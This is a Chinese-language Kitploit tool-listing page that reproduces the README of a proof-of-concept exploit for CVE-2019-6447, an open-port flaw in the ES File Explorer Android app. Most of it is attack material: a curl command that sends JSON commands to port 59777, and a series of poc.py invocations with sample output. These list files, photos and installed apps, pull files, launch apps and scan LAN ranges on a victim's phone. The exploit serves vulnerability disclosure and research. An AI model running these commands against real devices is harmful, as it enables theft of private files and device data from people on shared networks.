Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ESFileExplorerOpenPortVuln — ES File Explorer 开放端口漏洞 - CVE-2019-6447 | Kitploit
工具/GitHubGitHub/fs0c131y/esfileexploreropenportvuln
Android安全侦察漏洞分析漏洞利用Web应用程序漏洞利用数据泄露信息收集移动安全
GitHubfs0c131y/esfileexploreropenportvuln

ESFileExplorerOpenPortVuln

ES File Explorer 开放端口漏洞 - CVE-2019-6447

查看仓库
67812927年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

ES文件浏览器开放端口漏洞 - CVE-2019-6447

根据其在Google Play上的描述:

ES文件浏览器(文件管理器)是一款功能齐全的文件(图片、音乐、电影、文档、应用)管理器,支持本地和网络使用!全球超过5亿用户,ES文件浏览器(文件管理器)帮助您高效地管理安卓手机和文件,并无数据成本地分享文件。

每次用户启动该应用时,都会启动一个HTTP服务器。该服务器在本地开放端口59777:

root@kitploit:~
angler:/ # netstat -ap | grep com.estrongs
tcp6       0      0 :::59777                :::*                    LISTEN      5696/com.estrongs.android.pop

在此端口上,攻击者可以向目标发送JSON载荷

root@kitploit:~
curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777

这些命令允许与受害者处于同一局域网的攻击者获取受害者手机的大量敏感信息(设备信息、已安装应用等),远程获取文件以及远程启动应用。

受影响版本

4.1.9.7.4 及以下版本

POC特性

使用以下概念验证(POC),您可以:

  • 列出受害者设备sdcard中的所有文件
  • 列出受害者设备中的所有图片
  • 列出受害者设备中的所有视频
  • 列出受害者设备中的所有音频文件
  • 列出受害者设备中安装的所有应用
  • 列出受害者设备中安装的所有系统应用
  • 列出受害者设备中安装的所有手机应用
  • 列出存储在受害者设备sdcard中的所有apk文件
  • 列出受害者设备中安装的所有应用
  • 获取受害者设备的设备信息
  • 从受害者设备中拉取文件
  • 启动您选择的应用
  • 获取您选择的应用的图标

演示

演示

如何使用

root@kitploit:~
$ python poc.py -g /sdcard/Android/media/com.google.android.talk/Ringtones/hangouts_incoming_call.ogg

$ python poc.py --cmd appPull --pkg com.tencent.mm

$ python poc.py --cmd getAppThumbnail --pkg com.tencent.mm

$ python poc.py --cmd appLaunch --pkg com.tencent.mm
{"result":"0"}

$ python poc.py --cmd getDeviceInfo
{"name":"Nexus 6P", "ftpRoot":"/sdcard", "ftpPort":"3721"}

$ python poc.py --cmd listAppsAll
{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"},
{"packageName":"com.android.cts.priv.ctsshim", "label":"com.android.cts.priv.ctsshim", "version":"8.1.0-4396705", "versionCode":"27", "location":"/system/priv-app/CtsShimPrivPrebuilt/CtsShimPrivPrebuilt.apk", "size":"22744", "status":"null", "mTime":"1230796800000"}

$ python poc.py --cmd listAppsPhone
{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"}

$ python poc.py --cmd listAppsSystem
{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"}

$ python poc.py --cmd listApps
{"packageName":"com.google.android.youtube", "label":"YouTube", "version":"13.50.52", "versionCode":"1350523400", "location":"/data/app/com.google.android.youtube-hg9X1FaylPbUXO1SaiFtkg==/base.apk", "size":"36860368", "status":"com.google.android.apps.youtube.app.application.backup.YouTubeBackupAgent", "mTime":"1545337705957"}

$ python poc.py --cmd listAppsSdcard

$ python poc.py --cmd listAudios
{"name":"hangouts_incoming_call.ogg", "time":"10/17/18 11:33:16 PM", "location":"/storage/emulated/0/Android/media/com.google.android.talk/Ringtones/hangouts_incoming_call.ogg", "duration":5000, "size":"74.63 KB (76,425 Bytes)", }

$ python poc.py --cmd listPics
{"name":"mmexport1546422097497.jpg", "time":"1/2/19 10:41:37 AM", "location":"/storage/emulated/0/tencent/MicroMsg/WeChat/mmexport1546422097497.jpg", "size":"38.80 KB (39,734 Bytes)", }

$ python poc.py --cmd listVideos

$ python poc.py --cmd listFiles

$ python poc.py --cmd listFiles --network 192.168.1.

$ python poc.py --cmd listFiles --ip 192.168.4.17

$ python poc.py list

######################
# Available Commands #
######################

listFiles: List all the files
listPics: List all the pictures
listVideos: List all the videos
listAudios: List all the audio files
listApps: List all the apps installed
listAppsSystem: List all the system apps
listAppsPhone: List all the phone apps
listAppsSdcard: List all the apk files in the sdcard
listAppsAll: List all the apps installed (system apps included)
getDeviceInfo: Get device info
appPull: Pull an app from the device. Package name parameter is needed
appLaunch: Launch an app. Package name parameter is needed
getAppThumbnail: Get the icon of an app. Package name parameter is needed

联系方式

在Twitter上关注我!您也可以在https://fs0c131y.com找到我的一部分工作。

致谢

根据@moonbocal的提示,本调查和POC由@fs0c131y用❤️完成。

下载工具